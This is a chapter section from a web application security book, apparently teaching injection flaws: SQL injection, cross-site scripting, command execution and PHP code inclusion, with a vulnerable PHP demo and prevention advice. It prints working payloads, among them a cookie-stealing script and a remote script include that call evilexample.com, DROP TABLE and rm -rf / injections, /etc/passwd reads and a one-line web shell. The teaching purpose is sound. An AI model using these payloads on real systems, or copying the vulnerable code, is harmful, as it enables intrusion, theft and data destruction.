10.6. Injection FlawsFinally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered were mostly harmless you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows. Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database. Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected:
Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in the section Section 10.9. 10.6.1. SQL InjectionSQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data. 10.6.1.1 A working exampleSQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so do not type it. Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money. CREATE DATABASE sql_injection_test; USE sql_injection_test; CREATE TABLE customers ( customerid INTEGER NOT NULL, username CHAR(32) NOT NULL, password CHAR(32) NOT NULL, PRIMARY KEY(customerid) ); INSERT INTO customers ( customerid, username, password ) VALUES ( 1, 'ivanr', 'secret' ); INSERT INTO customers ( customerid, username, password ) VALUES ( 2, 'jelena', 'alsosecret' ); CREATE TABLE accounts ( accountid INTEGER NOT NULL, customerid INTEGER NOT NULL, balance DECIMAL(9, 2) NOT NULL, PRIMARY KEY(accountid) ); INSERT INTO accounts ( accountid, customerid, balance ) VALUES ( 1, 1, 1000.00 ); INSERT INTO accounts ( accountid, customerid, balance ) VALUES ( 2, 2, 2500.00 ); Create a PHP file named view_customer.php with the following code inside, and set the values of the variables at the top of the file as appropriate to enable the script to establish a connection to your database: <? $dbhost = "localhost"; $dbname = "sql_injection_test"; $dbuser = "root"; $dbpass = ""; // connect to the database engine if (!mysql_connect($dbhost, $dbuser, $dbpass)) { die("Could not connect: " . mysql_error( )); } // select the database if (!mysql_select_db($dbname)) { die("Failed to select database $dbname:" . mysql_error( )); } // construct and execute query $query = "SELECT username FROM customers WHERE customerid = " . $_REQUEST["customerid"]; $result = mysql_query($query); if (!$result) { die("Failed to execute query [$query]: " . mysql_error( )); } // show the result while ($row = mysql_fetch_assoc($result)) { echo "USERNAME = " . $row["username"] . "<br>"; } // close the connection mysql_close( ); ?> This script might be written by a programmer who does not know about SQL injection attacks. The script is designed to accept the customer ID as its only parameter (named customerid). Suppose you request a page using the following URL: http://www.example.com/view_customer.php?customerid=1 The PHP script will retrieve the username of the customer (in this case, ivanr) and display it on the screen. All seems well, but what we have in the query in the PHP file is the worst-case SQL injection scenario. The customer ID supplied in a parameter becomes a part of the SQL query in a process of string concatenation. No checking is done to verify that the parameter is in the correct format. Using simple URL manipulation, the attacker can inject SQL commands directly into the database query, as in the following example: http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2 If you specify the URL above, you will get two usernames displayed on the screen instead of a single one, which is what the programmer intended for the program to supply. Notice how we have URL-encoded some characters to put them into the URL, specifying %20 for the space character and %3D for an equals sign. These characters have special meanings when they are a part of a URL, so we had to hide them to make the URL work. After the URL is decoded and the specified customerid sent to the PHP program, this is what the query looks like (with the user-supplied data emphasized for clarity): SELECT username FROM customers WHERE customerid = 1 OR customerid=2 This type of SQL injection is the worst-case scenario because the input data is expected to be an integer, and in that case many programmers neglect to validate the incoming value. Integers can go into an SQL query directly because they cannot cause a query to fail. This is because integers consist only of numbers, and numbers do not have a special meaning in SQL. Strings, unlike integers, can contain special characters (such as single quotation marks) so they have to be converted into a representation that will not confuse the database engine. This process is called escaping and is usually performed by preceding each special character with a backslash character. Imagine a query that retrieves the customer ID based on the username. The code might look like this: $query = "SELECT customerid FROM customers WHERE username = '" . $_REQUEST["username"] . "'"; You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this: http://www.example.com/view_customer.php?username=ivanr The query becomes: SELECT customerid FROM customers WHERE username = 'ivanr' Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection: http://www.example.com/view_customer.php?username=ivanr'%20OR %20username%3D'jelena'--%20 By adding a single quote to the username parameter, we terminated the string and entered the query space. However, to make the query work, we added an SQL comment start (--) at the end, neutralizing the single quote appended at the end of the query in the code. The query becomes: SELECT customerid FROM customers WHERE username = 'ivanr' OR username='jelena'-- ' The query returns two customer IDs, rather than the one intended by the programmer. This type of attack is actually often more difficult to do than the attack in which single quotes were not used because some environments (PHP, for example) can be configured to automatically escape single quotes that appear in the input URL. That is, they may change a single quote (') that appears in the input to \', in which the backslash indicates that the single quote following it should be interpreted as the single quote character, not as a quote delimiting a string. Even programmers who are not very security-conscious will often escape single quotes because not doing so can lead to errors when an attempt is made to enter a name such as O'Connor into the application. Though the examples so far included only the SELECT construct, INSERT and DELETE statements are equally vulnerable. The only way to avoid SQL injection problems is to avoid using simple string concatenation as a way to construct queries. A better (and safe) approach, is to use prepared statements. In this approach, a query template is given to the database, followed by the separate user data. The database will then construct the final query, ensuring no injection can take place. 10.6.1.2 UnionWe have seen how SQL injection can be used to access data from a single table. If the database system supports the UNION construct (which MySQL does as of Version 4), the same concept can be used to fetch data from multiple tables. With UNION, you can append a new query to fetch data and add it to the result set. Suppose the parameter customerid from the previous example is set as follows: http://www.example.com/view_customer.php?customerid=1%20UNION%20ALL %20SELECT%20balance%20FROM%20accounts%20WHERE%20customerid%3D2 the query becomes: SELECT username FROM customers WHERE customerid = 1 UNION ALL SELECT balance FROM accounts WHERE customerid=2 The original query fetches a username from the customers table. With UNION appended, the modified query fetches the username but it also retrieves an account balance from the accounts table. 10.6.1.3 Multiple statements in a queryThings become really ugly if the database system supports multiple statements in a single query. Though our attacks so far were a success, there were still two limitations:
With multiple statements possible, we are free to submit a custom-crafted query to perform any action on the database (limited only by the permissions of the user connecting to the database). When allowed, statements are separated by a semicolon. Going back to our first example, here is the URL to remove all customer information from the database: http://www.example.com/view_customer.php?customerid=1;DROP%20 TABLE%20customers After SQL injection takes place, the second SQL query to be executed will be DROP TABLE customers. 10.6.1.4 Special database featuresExploiting SQL injection flaws can be hard work because there are many database engines, and each engine supports different features and a slightly different syntax for SQL queries. The attacker usually works to identify the type of database and then proceeds to research its functionality in an attempt to use some of it. Databases have special features that make life difficult for those who need to protect them:
10.6.1.5 SQL injection attack resourcesWe have only exposed the tip of the iceberg with our description of SQL injection flaws. Being the most popular flaw, they have been heavily researched. You will find the following papers useful to learn more about such flaws.
10.6.2. Cross-Site ScriptingUnlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will. This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with malicious payload. As a result, malicious code will be executed in the security context of the browser. Suppose a script contains an insecure PHP code fragment such as the following: <? echo $_REQUEST["param"] ?> It can be attacked with a URL similar to this one: http://www.example.com/xss.php?param=<script>alert(document.location)</script> The final page will contain the JavaScript code given to the script as a parameter. Opening such a page will result in a JavaScript pop-up box appearing on the screen (in this case displaying the contents of the document.location variable) though that is not what the original page author intended. This is a proof of concept you can use to test if a script is vulnerable to cross-site scripting attacks. Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database. Whenever a request is made to see the attacker's registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time. XSS attacks can have some of the following consequences:
In our first XSS example, we displayed the contents of the document.location variable in a dialog box. The value of the cookie is stored in document.cookie. To steal a cookie, you must be able to send the value somewhere else. An attacker can do that with the following code: <script>document.write('<img src=http://www.evilexample.com/' + document.cookie>)</script> If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely: <script src=http://www.evilexample.com/script.js></script>
XSS attacks can be difficult to detect because most action takes place at the browser, and there are no traces at the server. Usually, only the initial attack can be found in server logs. If one can perform an XSS attack using a POST request, then nothing will be recorded in most cases, since few deployments record POST request bodies. One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies used for session management only. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, only Internet Explorer supports this feature. XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe. 10.6.2.1 XSS attack resources
10.6.3. Command ExecutionCommand execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data. Command executions are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code: $output = `ls -al /home/$username`; echo $output; This code is meant to display a list of files in a folder. If a semicolon is used in the input, it will mark the end of the first command, and the beginning of the second. The second command can be anything you want. The invocation: http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd It will display the contents of the passwd file on the server. Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:
The most commonly used attack vector for command execution is mail sending in form-to-email scripts. These scripts are typically written in Perl. They are written to accept data from a POST request, construct the email message, and use sendmail to send it. A vulnerable code segment in Perl could look like this: # send email to the user open(MAIL, "|/usr/lib/sendmail $email"); print MAIL "Thank you for contacting us.\n"; close MAIL; This code never checks whether the parameter $email contains only the email address. Since the value of the parameter is used directly on the command line an attacker could terminate the email address using a semicolon, and execute any other command on the system. http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/ 10.6.4. Code ExecutionCode execution is a variation of command execution. It refers to execution of the code (script) that runs in the web server rather than direct execution of operating system commands. The end result is the same because attackers will only use code execution to gain command execution, but the attack vector is different. If the attacker can upload a code fragment to the server (using FTP or file upload features of the application) and the vulnerable application contains an include( ) statement that can be manipulated, the statement can be used to execute the uploaded code. A vulnerable include( ) statement is usually similar to this: include($_REQUEST["module"] . "/index.php"); Here is an example URL with which it can be used: http://www.example.com/index.php?module=news In this particular example, for the attack to work the attacker must be able to create a file called index.php anywhere on the server and then place the full path to it in the module parameter of the vulnerable script. As discussed in Chapter 3, the allow_url_fopen feature of PHP is extremely dangerous and enabled by default. When it is used, any file operation in PHP will accept and use a URL as a filename. When used in combination with include( ), PHP will download and execute a script from a remote server (!): http://www.example.com/index.php?module=http://www.evilexample.com Another feature, register_globals, can contribute to exploitation. Fortunately, this feature is disabled by default in recent PHP versions. I strongly advise you to keep it disabled. Even when the script is not using input data in the include() statement, it may use the value of some other variable to construct the path: include($TEMPLATES . "/template.php"); With register_globals enabled, the attacker can possibly override the value of the $TEMPLATES variable, with the end result being the same: http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com It's even worse if the PHP code only uses a request parameter to locate the file, like in the following example: include($parameter); When the register_globals option is enabled in a request that is of multipart/form-data type (the type of the request is determined by the attacker so he can choose to have the one that suits him best), PHP will store the uploaded file somewhere on disk and put the full path to the temporary file into the variable $parameter. The attacker can upload the malicious script and execute it in one go. PHP will even delete the temporary file at the end of request processing and help the attacker hide his tracks! Sometimes some other problems can lead to code execution on the server if someone manages to upload a PHP script through the FTP server and get it to execute in the web server. (See the www.apache.org compromise mentioned near the end of the "SQL Injection" section for an example.) A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image he will be able to execute anything on the server. He will often only upload a one-line script similar to this one: <? passthru($cmd) ?> Try it out for yourself and see how easy it can be. 10.6.5. Preventing Injection AttacksInjection attacks can be prevented if proper thought is given to the problem in the software design phase. These attacks can occur anywhere where characters with a special meaning, metacharacters, are mixed with data. There are many types of metacharacters. Each system component can use different metacharacters for different purposes. In HTML, for example, special characters are &, <, >, ", and '. Problems only arise if the programmer does not take steps to handle metacharacters properly. To prevent injection attacks, a programmer needs to perform four steps:
Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library. The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation. |